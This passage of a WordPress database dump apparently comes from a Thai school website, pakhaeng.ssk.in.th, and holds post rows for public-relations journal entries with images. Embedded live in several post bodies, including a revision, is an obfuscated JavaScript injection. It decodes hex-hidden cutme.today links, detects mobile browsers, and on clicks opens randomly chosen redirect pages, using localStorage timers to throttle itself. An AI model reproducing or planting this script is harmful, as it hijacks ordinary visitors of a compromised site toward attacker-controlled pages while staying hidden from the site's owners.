u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-14','','','2024-07-27 22:46:48','2024-07-27 15:46:48','',0,'http://pakhaeng.ssk.in.th/?p=227',0,'post','',0),
(228,1,'2024-07-27 22:46:32','2024-07-27 15:46:32','','13-2566','','inherit','','closed','','13-2566-2','','','2024-07-27 22:46:32','2024-07-27 15:46:32','',227,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/13-2566-1.png',0,'attachment','image/png',0),
(229,1,'2024-07-27 22:46:47','2024-07-27 15:46:47','<!-- wp:image {\"id\":228,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/13-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-228\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','227-revision-v1','','','2024-07-27 22:46:47','2024-07-27 15:46:47','',227,'http://pakhaeng.ssk.in.th/?p=229',0,'revision','',0),
(230,1,'2024-07-27 22:47:42','2024-07-27 15:47:42','<!-- wp:image {\"id\":232,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/14-2566-2-724x1024.png\" alt=\"\" class=\"wp-image-232\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let 